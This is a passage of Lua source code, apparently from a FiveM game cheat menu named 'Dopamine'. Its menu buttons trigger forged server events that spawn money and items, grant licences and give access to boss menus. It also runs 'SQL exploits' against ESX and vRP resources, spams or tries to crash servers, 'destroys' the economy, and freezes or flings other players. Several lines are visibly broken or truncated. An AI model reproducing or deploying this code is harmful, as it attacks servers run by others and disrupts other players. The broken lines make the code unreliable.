- elseif Dopamine.button('Get All Licenses', 'Server') then
- Dopamine.functions.exploits.esx_givelicenses()
- elseif Dopamine.button('GCPhone Earrape', 'Server') then
- Dopamine.functions.exploits.gcphoneTwitter()
- elseif Dopamine.button('Licenses SQL Exploit', 'Server') then
- Dopamine.functions.exploits.esx_license()
- elseif Dopamine.button('Police Alert Spam', 'Server') then
- Dopamine.functions.exploits.esx_outlawalert()
- elseif Dopamine.button('Bill Everyone', 'Server') then
- Dopamine.functions.exploits.esx_billing()
- elseif Dopamine.button('Phone J~s~obs Spam', 'Server') then
- Dopamine.functions.exploits.phoneSpam()
- elseif Dopamine.button('Spam Server Console', 'Server') then
- Dopamine.functions.exploits.esx_spam_server_console()
- elseif Dopamine.button('Police Job Crash Attempt ~r~(!)', 'Server') then
- Dopamine.functions.exploits.esx_policejob_crash()
- elseif Dopamine.comboBox('Open Boss Menu ~r~(!)', availableESXBossMenus, currentESXOpenBossMenu, selectedESXOpenBossMenu,
- function(currentIndex, selectedIndex)
- currentESXOpenBossMenu = currentIndex
- selectedESXOpenBossMenu = currentIndex
- end)
- then
- Dopamine.dTCE(false, false, 'esx_society:openBossMenu', string.lower(availableESXBossMenus[selectedESXOpenBossMenu]), function(data, menu) menu.close() end)
- Dopamine.closeMenu()
- elseif Dopamine.comboBox('Kashacters SQL Exploit', Dopamine.menuTables.serverKashactersSQL.words, Dopamine.menuTables.serverKashactersSQL.current, Dopamine.menuTables.serverKashactersSQL.selected,
- function(currentIndex, selectedIndex)
- Dopamine.menuTables.serverKashactersSQL.current = currentIndex
- Dopamine.menuTables.serverKashactersSQL.selected = currentIndex
- Dopamine.menuTables.serverKashactersSQL.actual = Dopamine.menuTables.serverKashactersSQL.lists[Dopamine.menuTables.serverKashactersSQL.selected]
- end)
- then
- Dopamine.functions.exploits.esx_kashacters(false, 'clean', Dopamine.menuTables.serverKashactersSQL.actual)
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsTriggerEventsESXMoney') then
- if Dopamine.comboBox('Harvest Items ~r~(!)', {'Weed', 'Opium', 'Meth', 'Coke', 'Gaz Bottle', 'Fix Tool', 'Caro Tool'}, currentESXHarvestItem, selectedESXHarvestItem,
- function(currentIndex, selectedIndex)
- currentESXHarvestItem = currentIndex
- selectedESXHarvestItem = currentIndex
- end)
- then
- Dopamine.functions.exploits.esx_harvestitems()
- elseif Dopamine.comboBox('Generate Job Paycheck ~r~(!)', Dopamine.menuTables.exploitableJobsTable.Money, currentESXJobPaycheck, selectedESXJobPaycheck,
- function(currentIndex, selectedIndex)
- currentESXJobPaycheck = currentIndex
- selectedESXJobPaycheck = currentIndex
- end)
- then
- local money = Dopamine.trashFunctions.keyboardInput('Enter the amount of money for paycheck', '', 10)
- if not then
- Dopamine.dTCE(false, true, Dopamine.menuTables.exploitableJobsTable.Money.Value[selectedESXJobPaycheck]..':pay', tonumber(money))
- end
- elseif Dopamine.comboBox('Spawn J~s~obs Items ~r~(!)', Dopamine.menuTables.exploitableJobsTable.Item, currentESXItemSpawn, selectedESXItemSpawn,
- function(currentIndex, selectedIndex)
- currentESXItemSpawn = currentIndex
- selectedESXItemSpawn = currentIndex
- end)
- then
- Dopamine.functions.exploits.esx_jobitems()
- elseif Dopamine.comboBox('Spawn Custom Items ~r~(!)', Dopamine.menuTables.customExploitableItems.Item, currentESXCustomItemSpawn, selectedESXCustomItemSpawn,
- function(currentIndex, selectedIndex)
- currentESXCustomItemSpawn = currentIndex
- selectedESXCustomItemSpawn = currentIndex
- end)
- then
- Dopamine.functions.exploits.esx_spawncustomitems()
- elseif Dopamine.button('Spawn A Custom Item ~r~(!)', 'Server') then
- Dopamine.functions.exploits.esx_spawncustomitem()
- elseif Dopamine.button('Stop Harvesting ~r~(!)', 'Server') then
- Dopamine.functions.exploits.esx_harvest_stop()
- elseif Dopamine.button('Wash Dirty Money ~r~(!)', 'Server') then
- Dopamine.functions.exploits.esx_moneywash()
- elseif Dopamine.button('Moneymaker ~r~(!)', 'Server') then
- Dopamine.functions.exploits.esx_moneymaker()
- elseif Dopamine.button('Destory Economy ~r~(!)', 'Server') then
- Dopamine.functions.exploits.run_esx_moneymaker(1337539100, 25)
- Dopamine.functions.exploits.esx_give_something('item_money', 'money', 10000000)
- for yeet=0, #Dopamine.natives.getActivePlayers() do
- Dopamine.functions.sPO.SpawnLegalVehicle('blista', yeet, Dopamine.trashFunctions.getRandomLetter(3) .. ' ' .. Dopamine.trashFunctions.getRandomNumber(4))
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('serverOptionsTriggerEventsVRP') then
- if Dopamine.button('Toggle Handcuffs', 'Client') then
- vRP.toggleHandcuff()
- elseif Dopamine.button('Clear Wanted Level', 'Client') then
- vRP.applyWantedLevel(0)
- elseif Dopamine.button('Trucker Job Money', 'Client') then
- local money = Dopamine.trashFunctions.keyboardInput('Enter $ Amount:', '', 12)
- if not then
- local distance = money / 3.80 --[[ money is distance*3.80]]
- vRPtruckS = Tunnel.getInterface('vRP_trucker', 'vRP_trucker')
- vRPtruckS.finishTruckingDelivery({distance})
- end
- elseif Dopamine.button('Casino Chips', 'Client') then
- local amount = Dopamine.trashFunctions.keyboardInput('Enter Chips Amount:', '', 12)
- if not then
- vRPcasinoS = Tunnel.getInterface('vRP_casino','vRP_casino')
- vRPcasinoS.payRouletteWinnings({amount, 2})
- end
- elseif Dopamine.button('Chests Money', 'Server') then
- Dopamine.dTCE(true, true, 'basic')
- Dopamine.dTCE(true, true, 'silver')
- Dopamine.dTCE(true, true, 'legendary')
- elseif Dopamine.button('Los Santos Customs', 'Server') then
- local m = Dopamine.trashFunctions.keyboardInput('Enter amount of money', '', 12)
- if not then
- Dopamine.dTCE(false, true, 'lscustoms:payGarage', { costs = -m })
- end
- elseif Dopamine.button('Slot Machine', 'Server') then
- local m = Dopamine.trashFunctions.keyboardInput('Enter amount of money', '', 12)
- if not then
- Dopamine.dTCE(false, true, 'vrp_slotmachine:server:2', m)
- end
- elseif Dopamine.button('Legacy Fuel', 'Server') then
- local m = Dopamine.trashFunctions.keyboardInput('Enter amount of money', '', 12)
- if not then
- Dopamine.dTCE(false, true, 'LegacyFuel:PayFuel', { costs = -m })
- end
- elseif Dopamine.button('Get Driving License', 'Server') then
- Dopamine.dTCE(false, true, 'dmv:success')
- elseif Dopamine.button('Bank Deposit', 'Server') then
- local m = Dopamine.trashFunctions.keyboardInput('Enter amount of money', '', 12)
- if not then
- Dopamine.dTCE(false, true, 'Banca:deposit', m)
- Dopamine.dTCE(false, true, 'bank:deposit', m)
- end
- elseif Dopamine.button('Bank Withdraw', 'Server') then
- local m = Dopamine.trashFunctions.keyboardInput('Enter amount of money', '', 12)
- if not then
- Dopamine.dTCE(false, true, 'bank:withdraw', m)
- Dopamine.dTCE(false, true, 'Banca:withdraw', m)
- end
- end
- Dopamine.runDrawMenu()
- end
- local currentVehicle = Dopamine.datastore.pLocalPlayer.cVehicle
- if currentVehicle then
- SetVehicleModKit(currentVehicle, 0)
- for i, actual_i in pairs(Dopamine.menuTables.vehiclePerformanceTable) do
- if Dopamine.isMenuOpened('vehicleLosSantosCustomsPerformance' then
- local modType =
- local modName =' Level '
- local modCount = GetNumVehicleMods(currentVehicle, modType) - 1
- for i=0, modCount, 1 do
- if Dopamine.button(modName..i, 'Native') then
- SetVehicleMod(currentVehicle, modType, i)
- end
- end
- Dopamine.runDrawMenu()
- end
- end
- end
- --[[local currentVehicle = Dopamine.datastore.pLocalPlayer.cVehicle
- if currentVehicle then
- SetVehicleModKit(currentVehicle, 0)
- local modType = 15
- local modName = 'Suspension Level '
- local modCount = GetNumVehicleMods(currentVehicle, modType) - 1
- for i=0, modCount, 1 do
- if Dopamine.button(modName..i, 'Native') then
- SetVehicleMod(currentVehicle, modType, i)
- end
- end
- end]]
- --[[
- Notifications
- ]]
- if #Dopamine.cachedNotifications > 0 then
- for notificationIndex = 1, #Dopamine.cachedNotifications do
- local notification = Dopamine.cachedNotifications[notificationIndex]
- if notification then
- notification['opacity'] = (notification['opacity'] or (notification['time'] / 1000) * 60) - 1
- local offset = 0.005 + (notificationIndex * .05)
- local notificationTimer = (GetGameTimer() - notification['startTime']) / notification['time'] * 100
- Dopamine.draw_3D(0.5, 0.8 * offset, notification['text'], notification['opacity'])
- if notificationTimer >= 100 then
- Dopamine.removeNotification(notificationIndex)
- end
- end
- end
- end
- --[[
- Run every frame/tick | Make sure that functions do not use pWait
- ]]
- SetPlayerInvincible(PlayerId(), Dopamine.storedControls.godmode)
- SetEntityInvincible(Dopamine.datastore.pLocalPlayer.pedId, Dopamine.storedControls.godmode)
- SetEntityProofs(Dopamine.datastore.pLocalPlayer.pedId, Dopamine.storedControls.godmode, Dopamine.storedControls.godmode, Dopamine.storedControls.godmode, Dopamine.storedControls.godmode, Dopamine.storedControls.godmode)
- SetPedCanRagdoll(Dopamine.datastore.pLocalPlayer.pedId, not Dopamine.storedControls.noRagdoll)
- if Dopamine.storedControls.semiGodmode then
- if GetEntityHealth(Dopamine.datastore.pLocalPlayer.pedId) < 200 then
- Dopamine.natives.setEntityHealth(Dopamine.datastore.pLocalPlayer.pedId, 200)
- end
- end
- if Dopamine.storedControls.neverWanted then
- ClearPlayerWantedLevel(PlayerId())
- end
- if Dopamine.storedControls.invisible then
- Dopamine.storedControls.bInvisible = true
- Dopamine.natives.setEntityVisible(Dopamine.datastore.pLocalPlayer.pedId, 0, 0)
- end
- if not Dopamine.storedControls.invisible and Dopamine.storedControls.bInvisible then
- Dopamine.storedControls.bInvisible = false
- Dopamine.natives.setEntityVisible(Dopamine.datastore.pLocalPlayer.pedId, 1, 1)
- end
- if Dopamine.storedControls.infStamina then
- ResetPlayerStamina(PlayerId())
- end
- if Dopamine.storedControls.noClip then
- Dopamine.functions.noclipAdv()
- end
- if Dopamine.storedControls.superJump then
- SetSuperJumpThisFrame(PlayerId())
- end
- if Dopamine.storedControls.tinyPlayer then
- Dopamine.storedControls.bTinyPlayer = true
- SetPedConfigFlag(Dopamine.datastore.pLocalPlayer.pedId, 223, true)
- elseif not Dopamine.storedControls.tinyPlayer and Dopamine.storedControls.bTinyPlayer then
- Dopamine.storedControls.bTinyPlayer = false
- SetPedConfigFlag(Dopamine.datastore.pLocalPlayer.pedId, 223, false)
- end
- SetSeethrough(Dopamine.storedControls.heatVision)
- SetNightvision(Dopamine.storedControls.nightVision)
- if Dopamine.storedControls.flashmanSP then
- Dopamine.functions.doForceFieldTick(5)
- SetSuperJumpThisFrame(PlayerId())
- SetRunSprintMultiplierForPlayer(PlayerId(), 1.49)
- SetPedMoveRateOverride(PlayerId(), 10.0)
- RequestNamedPtfxAsset('core')
- UseParticleFxAssetNextCall('core')
- StartNetworkedParticleFxNonLoopedOnEntity('ent_sht_electrical_box', Dopamine.datastore.pLocalPlayer.pedId, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 1.0, false, false, false)
- end
- if Dopamine.storedControls.sPOFlingPlayer then
- local coords = GetEntityCoords(GetPlayerPed(Dopamine.storedControls.sPOFlingedPlayer))
- Dopamine.natives.addExplosion(coords.x, coords.y, coords.z, 4, 0.0, 0, 1, 0.0, 1)
- end
- if Dopamine.storedControls.aPOFreeze then
- Dopamine.functions.aPO.freezeAll()
- end
- if Dopamine.storedControls.aPOFlyingCars then
- Dopamine.functions.aPO.flyingCars()
- end
- if Dopamine.storedControls.aPODisableDrivingCars then
- Dopamine.functions.aPO.disableDrivingCars()
- end
- if Dopamine.storedControls.aPONoisyVehs then
- Dopamine.functions.aPO.noisyVehicles()
- end
- if selectedCustomCrosshair == 2 then
- ShowHudComponentThisFrame(14)
- elseif selectedCustomCrosshair == 3 then
- Dopamine.functions.drawTextCrosshairs('+', 0.495, 0.484, 1.0, 0.3, Dopamine.mainColor)
- end
- if Dopamine.storedControls.visDrawFPS then
- local getFPS = (1.0 / GetFrameTime())
- Dopamine.functions.drawTextCrosshairs('~w~fps: ~s~'..Dopamine.trashFunctions.math_round(getFPS), 0.01, 0.02, Dopamine.mainColor)
- end
- Dopamine.natives.setArtificialLightsState(Dopamine.storedControls.visBlackout)
- if Dopamine.storedControls.visForceRadar then
- DisplayRadar(true)
- end
- if pedDensityXSelected < 1 then
- SetVehicleDensityMultiplierThisFrame(pedDensityXSelected)
- SetRandomVehicleDensityMultiplierThisFrame(pedDensityXSelected)
- SetParkedVehicleDensityMultiplierThisFrame(pedDensityXSelected)
- SetAmbientVehicleRangeMultiplierThisFrame(1.0)
- SetPedDensityMultiplierThisFrame(pedDensityXSelected)
- SetScenarioPedDensityMultiplierThisFrame(pedDensityXSelected, pedDensityXSelected)
- DistantCopCarSirens(false)
- SetGarbageTrucks(false)
- SetRandomBoats(false)
- SetCreateRandomCops(false)
- SetCreateRandomCopsNotOnScenarios(false)
- SetCreateRandomCopsOnScenarios(false)
- local x,y,z = table.unpack(GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId))
- ClearAreaOfVehicles(x, y, z, 1000, false, false, false, false, false)
- RemoveVehiclesFromGeneratorsInArea(x - 500.0, y - 500.0, z - 500.0, x + 500.0, y + 500.0, z + 500.0);
- end
- if Dopamine.comboBoxes[3]._actual[vehiclesEngineTorqueBoostCurrent] > 1 then
- SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), Dopamine.comboBoxes[3]._actual[vehiclesEngineTorqueBoostCurrent] + 0.0)
- end
- if Dopamine.comboBoxes[3]._actual[vehiclesEnginePowerBoostSelected] > 1 then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), Dopamine.comboBoxes[3]._actual[vehiclesEnginePowerBoostSelected] + 1.0)
- end
- if Dopamine.storedControls.vehGodmode and IsPedInAnyVehicle(PlayerPedId(-1), true) then
- SetEntityInvincible(Dopamine.datastore.pLocalPlayer.cVehicle, true)
- end
- if Dopamine.storedControls.vehAlwaysWheelie then
- if IsPedInAnyVehicle(GetPlayerPed(-1)) and GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1)), -1) == GetPlayerPed(-1) then
- SetVehicleWheelieState(GetVehiclePedIsIn(GetPlayerPed(-1)), 129)
- end
- end
- if Dopamine.storedControls.vehRainbowCol then
- local rgb = Dopamine.trashFunctions.returnRGB(1.0)
- Dopamine.trashFunctions.reqControlOnce(Dopamine.datastore.pLocalPlayer.cVehicle)
- SetVehicleCustomPrimaryColour(Dopamine.datastore.pLocalPlayer.cVehicle, rgb.r, rgb.g, rgb.b)
- SetVehicleCustomSecondaryColour(Dopamine.datastore.pLocalPlayer.cVehicle, rgb.r, rgb.g, rgb.b)
- end
- if Dopamine.storedControls.vehRainbowLights then
- local rgb = Dopamine.trashFunctions.returnRGB(1.0)
- Dopamine.trashFunctions.reqControlOnce(Dopamine.datastore.pLocalPlayer.cVehicle)
- SetVehicleNeonLightsColour(Dopamine.datastore.pLocalPlayer.cVehicle, rgb.r, rgb.g, rgb.b)
- for i = 1, 12 do
- SetVehicleHeadlightsColour(Dopamine.datastore.pLocalPlayer.cVehicle, i)
- end
- end
- SetPedCanBeKnockedOffVehicle(Dopamine.datastore.pLocalPlayer.pedId, Dopamine.storedControls.vehNoFall)
- if Dopamine.storedControls.vehWallride then
- if (IsPedInVehicle(Dopamine.datastore.pLocalPlayer.pedId, GetVehiclePedIsIn(Dopamine.datastore.pLocalPlayer.pedId, true), true)) then
- ApplyForceToEntity(GetVehiclePedIsIn(Dopamine.datastore.pLocalPlayer.pedId, true), 1, 0, 0, -0.4, 0, 0, 0, 1, true, true, true, true, true)
- end
- end
- if Dopamine.storedControls.teleShowCoords then
- x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
- roundx = tonumber(string.format('%.2f', x))
- roundy = tonumber(string.format('%.2f', y))
- roundz = tonumber(string.format('%.2f', z))
- Dopamine.functions.drawTextCrosshairs('~w~x: ~s~' .. roundx, 0.01, 0.04, Dopamine.mainColor)
- Dopamine.functions.drawTextCrosshairs('~w~y: ~s~' .. roundy, 0.01, 0.06, Dopamine.mainColor)
- Dopamine.functions.drawTextCrosshairs('~w~z: ~s~' .. roundz, 0.01, 0.08, Dopamine.mainColor)
- end
- if Dopamine.storedControls.visForceThirdperson then
- SetFollowPedCamViewMode(1)
- end
- if tonumber(intToFloat(Dopamine.storedControls.weaponsDamageMultiplierSet)) then
- SetPlayerWeaponDamageModifier(PlayerId(), tonumber(intToFloat(Dopamine.storedControls.weaponsDamageMultiplierSet)))
- SetPlayerMeleeWeaponDamageModifier(PlayerId(), tonumber(intToFloat(Dopamine.storedControls.weaponsDamageMultiplierSet)))
- end
- if Dopamine.storedControls.weapExplosiveAmmo then
- local impact, coords = GetPedLastWeaponImpactCoord(Dopamine.datastore.pLocalPlayer.pedId)
- if impact then
- Dopamine.natives.addExplosion(coords.x, coords.y, coords.z, 2, 100.0, true, false, 0)
- end
- SetExplosiveMeleeThisFrame(PlayerId())
- end
- if Dopamine.storedControls.weapCustomBullet then
- Dopamine.functions.customBullet()
- end
- if Dopamine.storedControls.weapTeleportGun then
- local impact, coords = GetPedLastWeaponImpactCoord(Dopamine.datastore.pLocalPlayer.pedId)
- if impact then
- Dopamine.functions.teleportSelf(coords.x, coords.y, coords.z + 3)
- end
- end
- if Dopamine.storedControls.weapRapidFire then
- Dopamine.functions.rapidFireTick()
- end
- --[[
- Keybinds
- ]]
- if Dopamine.keyBinds.currentKeybindMenu.handle and IsDisabledControlJustPressed(0, Keys[Dopamine.keyBinds.currentKeybindMenu.handle]) then
- Dopamine.openMenu('dopamine')
- end
- if Dopamine.keyBinds.currentKeybindHealth.handle and IsDisabledControlJustPressed(0, Keys[Dopamine.keyBinds.currentKeybindHealth.handle]) then
- Dopamine.natives.setEntityHealth(PlayerPedId(-1), 200)
- Dopamine.pushNotification('Health refilled', 5000)
- end
- if Dopamine.keyBinds.currentKeybindArmour.handle and IsDisabledControlJustPressed(0, Keys[Dopamine.keyBinds.currentKeybindArmour.handle]) then
- Dopamine.natives.setPedArmour(PlayerPedId(-1), 200)
- Dopamine.pushNotification('Armour refilled', 5000)
- end
- if Dopamine.keyBinds.currentKeybindNoclip.handle and IsDisabledControlJustPressed(0, Keys[Dopamine.keyBinds.currentKeybindNoclip.handle]) then
- Dopamine.functions.toggleNoclip()
- end
- pWait(0)
- end
- end)
- --[[
- Run 2 step separately because of pWait usage
- ]]
- pCreateThread(function()
- while Dopamine.shouldShowMenu do
- if Dopamine.storedControls.veh2Step then
- Dopamine.functions.vehicle2Step()
- end
- if Dopamine.storedControls.vehDriftSmoke then
- RequestNamedPtfxAsset('scr_recartheft')
- while not HasNamedPtfxAssetLoaded('scr_recartheft') do
- pWait(1)
- end
- RequestNamedPtfxAsset('core')
- while not HasNamedPtfxAssetLoaded('core') do
- pWait(1)
- end
- ang,speed =
- local _SIZE = 0.25
- local _DENS = 25
- local _BURNOUT_SIZE = 1.5
- if IsPedInAnyVehicle(GetPlayerPed(-1), false) then
- if speed >= 1.0 and ang ~= 0 then
-'scr_recartheft', 'scr_wheel_burnout', GetVehiclePedIsUsing(GetPlayerPed(-1)), _DENS, _SIZE)
- elseif --[[speed < 1.0 and]] IsVehicleInBurnout(GetVehiclePedIsUsing(GetPlayerPed(-1))) then
-'core', 'exp_grd_bzgas_smoke', GetVehiclePedIsUsing(GetPlayerPed(-1)), 3, _BURNOUT_SIZE)
- end
- end
- end
- if Dopamine.storedControls.visForceGamertags then
- local plist = Dopamine.natives.getActivePlayers()
- for i = 1, #plist do
- local id = plist[i]
- if GetPlayerPed(id) ~= GetPlayerPed(-1) then
- local ped = GetPlayerPed(id)
- --[[blip = GetBlipFromEntity( ped )]]
- local x1, y1, z1 = table.unpack( GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, true) )
- local x2, y2, z2 = table.unpack( GetEntityCoords(GetPlayerPed(id), true) )
- local distance = Dopamine.trashFunctions.math_round(#(vector3(x1, y1, z1) - vector3(x2, y2, z2)), 1)
- if distance < 125 then
- if NetworkIsPlayerTalking(id) then
- Dopamine.functions.drawText3DGamerTags(x2, y2, z2 + 1.25, '' .. GetPlayerServerId(id) .. ' | ' .. GetPlayerName(id) .. '', 30, 144, 255)
- else
- Dopamine.functions.drawText3DGamerTags(x2, y2, z2 + 1.25, '' .. GetPlayerServerId(id) .. ' | ' .. GetPlayerName(id) .. '', 255, 255, 255)
- end
- end
- end
- end
- end
- Dopamine.functions.playerBlips()
- pWait(0)
- end
- end)
- Dopamine.functions.drawText3DGamerTags = function(x, y, z, text, r, g, b)
- SetDrawOrigin(x, y, z, 0)
- Dopamine.natives.setTextFont(0)
- Dopamine.natives.setTextProportional(0)
- Dopamine.natives.setTextScale(0.0, 0.20)
- Dopamine.natives.setTextColour(r, g, b, 255)
- SetTextDropshadow(0, 0, 0, 0, 255)
- SetTextEdge(2, 0, 0, 0, 150)
- Dopamine.natives.setTextDropShadow()
- Dopamine.natives.setTextOutline()
- Dopamine.natives.beginTextCommandDisplayText('STRING')
- SetTextCentre(1)
- Dopamine.natives.addTextComponentSubstringPlayerName(text)
- Dopamine.natives.endTextCommandDisplayText(0.0, 0.0)
- ClearDrawOrigin()
- end
- --[[
- Functions here to keep menu clean
- ]]
- --[[
- Math functions here instead of using frameworks from servers.
- ]]
- Dopamine.functions.Math = {}
- Dopamine.functions.Math.Round = function(value, numDecimalPlaces)
- if numDecimalPlaces then
- local power = 10^numDecimalPlaces
- return math.floor((value * power) + 0.5) / (power)
- else
- return math.floor(value + 0.5)
- end
- end
- Dopamine.functions.Math.GroupDigits = function(value)
- local left,num,right = string.match(value,'^([^%d]*%d)(%d*)(.-)$')
- return left..(num:reverse():gsub('(%d%d%d)','%1' .. _U('locale_digit_grouping_symbol')):reverse())..right
- end
- Dopamine.functions.Math.Trim = function(value)
- if value then
- return (string.gsub(value, '^%s*(.-)%s*$', '%1'))
- else
- return nil
- end
- end
- Dopamine.functions.doesResourceExist = function(resource_name)
- if GetResourceState(resource_name) == 'started' or
- string.upper(GetResourceState(resource_name)) == 'started' or
- string.lower(GetResourceState(resource_name)) == 'started' or
- GetResourceState(resource_name..'-master') == 'started' or
- string.upper(GetResourceState(resource_name..'-master')) == 'started' or
- string.lower(GetResourceState(resource_name..'-master')) == 'started' then
- return true
- else
- return false
- end
- end
- Dopamine.functions.drawTextCrosshairs = function(C,x,y)
- Dopamine.natives.setTextColour(Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- Dopamine.natives.setTextFont(0)
- Dopamine.natives.setTextProportional(1)
- Dopamine.natives.setTextScale(0.0,0.4)
- SetTextDropshadow(1,0,0,0,255)
- SetTextEdge(1,0,0,0,255)
- Dopamine.natives.setTextDropShadow()
- Dopamine.natives.setTextOutline()
- Dopamine.natives.beginTextCommandDisplayText('STRING')
- Dopamine.natives.addTextComponentSubstringPlayerName(C)
- Dopamine.natives.endTextCommandDisplayText(x,y)
- end
- Dopamine.functions.teleportToWaypoint = function()
- pCreateThread(function()
- local entity = Dopamine.datastore.pLocalPlayer.pedId
- if IsPedInAnyVehicle(entity, false) then
- entity = GetVehiclePedIsUsing(entity)
- end
- local success = false
- local blipFound = false
- local blipIterator = GetBlipInfoIdIterator()
- local blip = GetFirstBlipInfoId(8)
- while DoesBlipExist(blip) do
- if GetBlipInfoIdType(blip) == 4 then
- cx, cy, cz = table.unpack(GetBlipInfoIdCoord(blip, Citizen.ReturnResultAnyway(), Citizen.ResultAsVector()))
- blipFound = true
- break
- end
- blip = GetNextBlipInfoId(blipIterator)
- pWait(0)
- end
- if blipFound then
- local groundFound = false
- local yaw = GetEntityHeading(entity)
- for i = 0, 1000, 1 do
- Dopamine.natives.setEntityCoordsNoOffset(entity, cx, cy, ToFloat(i), false, false, false)
- SetEntityRotation(entity, 0, 0, 0, 0, 0)
- SetEntityHeading(entity, yaw)
- SetGameplayCamRelativeHeading(0)
- pWait(0)
- if GetGroundZFor_3dCoord(cx, cy, ToFloat(i), cz, false) then
- cz = ToFloat(i)
- groundFound = true
- break
- end
- end
- if not groundFound then
- cz = -300.0
- end
- success = true
- end
- if success then
- Dopamine.natives.setEntityCoordsNoOffset(entity, cx, cy, cz, false, false, true)
- SetGameplayCamRelativeHeading(0)
- if IsPedSittingInAnyVehicle(Dopamine.datastore.pLocalPlayer.pedId) then
- if GetPedInVehicleSeat(Dopamine.datastore.pLocalPlayer.cVehicle, -1) == Dopamine.datastore.pLocalPlayer.pedId then
- SetVehicleOnGroundProperly(Dopamine.datastore.pLocalPlayer.cVehicle)
- end
- end
- end
- end)
- end
- Dopamine.functions.teleportSelf = function(x, y, z)
- if IsPedInAnyVehicle(GetPlayerPed(-1), 0) and GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1) then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- Dopamine.natives.setEntityCoords(entity, x, y, z)
- end
- end
- Dopamine.functions.runParticle = function()
- RequestNamedPtfxAsset('proj_xmas_firework')
- UseParticleFxAssetNextCall('proj_xmas_firework')
- StartNetworkedParticleFxNonLoopedOnEntity('scr_firework_xmas_burst_rgw', Dopamine.datastore.pLocalPlayer.pedId, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 1.0, false, false, false)
- end
- Dopamine.functions.runInjectParticle = function()
- RequestNamedPtfxAsset('proj_xmas_firework')
- UseParticleFxAssetNextCall('proj_xmas_firework')
- StartNetworkedParticleFxNonLoopedOnEntity('scr_firework_xmas_burst_rgw', Dopamine.datastore.pLocalPlayer.pedId, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 1.0, false, false, false)
- StartNetworkedParticleFxNonLoopedOnEntity('scr_firework_xmas_spiral_burst_rgw', Dopamine.datastore.pLocalPlayer.pedId, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 1.0, false, false, false)
- StartNetworkedParticleFxNonLoopedOnEntity('scr_xmas_firework_sparkle_spawn', Dopamine.datastore.pLocalPlayer.pedId, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 1.0, false, false, false)
- end
- --[[Dopamine.functions.runInjectParticle()]]
- Dopamine.functions.respawnPed = function(ped, coords, heading)
- Dopamine.natives.setEntityCoordsNoOffset(ped, coords.x, coords.y, coords.z, false, false, false, true)
- NetworkResurrectLocalPlayer(coords.x, coords.y, coords.z, heading, true, false)
- SetPlayerInvincible(ped, false)
- Dopamine.dTCE(false, false, 'playerSpawned', coords.x, coords.y, coords.z)
- ClearPedBloodDamage(ped)
- end
- Dopamine.functions.nativeRevive = function()
- local coords = GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId)
- local formattedCoords = {
- x = Dopamine.functions.Math.Round(coords.x, 1),
- y = Dopamine.functions.Math.Round(coords.y, 1),
- z = Dopamine.functions.Math.Round(coords.z, 1)
- }
- Dopamine.functions.respawnPed(Dopamine.datastore.pLocalPlayer.pedId, formattedCoords, 0.0)
- StopScreenEffect('DeathFailOut')
- Dopamine.pushNotification('Revived', 5000)
- end
- Dopamine.functions.repairVehicle = function(pvehicle)
- SetVehicleEngineHealth(pvehicle, 1000)
- SetVehicleFixed(pvehicle)
- SetVehicleEngineOn(pvehicle, 1, 1)
- SetVehicleBurnout(pvehicle, false)
- end
- Dopamine.functions.deleteVehicle = function(pvehicle, radius)
- pCreateThread(function()
- if radius then
- local playerPed = Dopamine.datastore.pLocalPlayer.pedId
- radius = tonumber(radius) + 0.01
- local vehicles =, radius)
- for k,entity in ipairs(vehicles) do
- local attempt = 0
- if entity == Dopamine.datastore.pLocalPlayer.cVehicle then entity = entity + 1 end
- while not NetworkHasControlOfEntity(entity) and attempt < 50 and DoesEntityExist(entity) do
- NetworkRequestControlOfEntity(entity)
- attempt = attempt + 1
- end
- if DoesEntityExist(entity) and NetworkHasControlOfEntity(entity) then
- SetEntityAsMissionEntity(entity, false, true)
- DeleteVehicle(entity)
- end
- end
- else
- SetEntityAsMissionEntity(pvehicle, false, true)
- DeleteVehicle(pvehicle)
- end
- end)
- end
- Dopamine.functions.optimizeFPS = function()
- ClearAllBrokenGlass()
- ClearAllHelpMessages()
- LeaderboardsReadClearAll()
- ClearBrief()
- ClearGpsFlags()
- ClearPrints()
- ClearSmallPrints()
- ClearReplayStats()
- LeaderboardsClearCacheData()
- ClearFocus()
- ClearHdArea()
- ClearPedBloodDamage(Dopamine.datastore.pLocalPlayer.pedId)
- ClearPedWetness(Dopamine.datastore.pLocalPlayer.pedId)
- ClearPedEnvDirt(Dopamine.datastore.pLocalPlayer.pedId)
- ResetPedVisibleDamage(Dopamine.datastore.pLocalPlayer.pedId)
- end
- Dopamine.functions.disappearFromChase = function()
- if IsPedInAnyVehicle(GetPlayerPed(-1)) then
- local vehicle = GetVehiclePedIsIn(Dopamine.datastore.pLocalPlayer.pedId, true)
- if DoesEntityExist(vehicle) then
- local targetx, targety, targetz = table.unpack(GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId))
- if Dopamine.storedControls.selectedDisappearFromChase == 1 then
- Dopamine.natives.setEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, targetx + 1, targety + 2, targetz + 100)
- elseif Dopamine.storedControls.selectedDisappearFromChase == 2 then
- Dopamine.natives.setEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, 195.23, -934.04, 30.69)
- elseif Dopamine.storedControls.selectedDisappearFromChase == 3 then
- Dopamine.natives.setEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, -1653.85, -860.87, 9.16)
- elseif Dopamine.storedControls.selectedDisappearFromChase == 4 then
